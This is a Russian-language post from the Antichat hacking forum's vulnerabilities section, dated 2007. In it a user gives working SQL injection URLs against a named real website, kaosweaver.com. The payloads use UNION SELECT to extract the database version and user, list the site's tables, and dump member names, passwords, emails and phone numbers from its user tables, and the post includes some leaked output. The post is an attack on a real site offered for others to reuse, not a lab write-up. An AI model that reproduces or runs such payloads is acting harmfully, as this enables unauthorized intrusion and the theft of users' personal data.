ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 01.11.2007, 10:58
Аватар для fRg
fRg
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695

Репутация: 524
Отправить сообщение для fRg с помощью ICQ
По умолчанию

kaosweaver.com
Код:
http://www.kaosweaver.com/ExtensionsHelp/kaoshelp.php?id=-1+union+select+concat_ws(0x3a,version(),database(),user()),2,3,4/*
5.0.27-standard:kaosweav_kwmaster:kaosweav_kuserdb@localh ost
76 таблиц:
Код:
http://www.kaosweaver.com/ExtensionsHelp/kaoshelp.php?id=-1+union+select+table_name,2,3,4+from+information_schema.tables+limit+75,1/*
Из интересных таблиц - bbs_users и tblMembers.
В bbs_users есть поля: username, password, email, url, jabber, realname, icq, msn, aim, yahoo.
А в tblMembers есть поля m_firstName, m_lastName, m_password, m_email, m_phone ну и адрес,
факс и прочая херь...
Код:
http://www.kaosweaver.com/ExtensionsHelp/kaoshelp.php?id=-1+union+select+concat_ws(0x3a,m_firstName,m_lastName,m_password,m_email,m_phone),2,3,4+from+tblMembers+limit+0,1/*
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ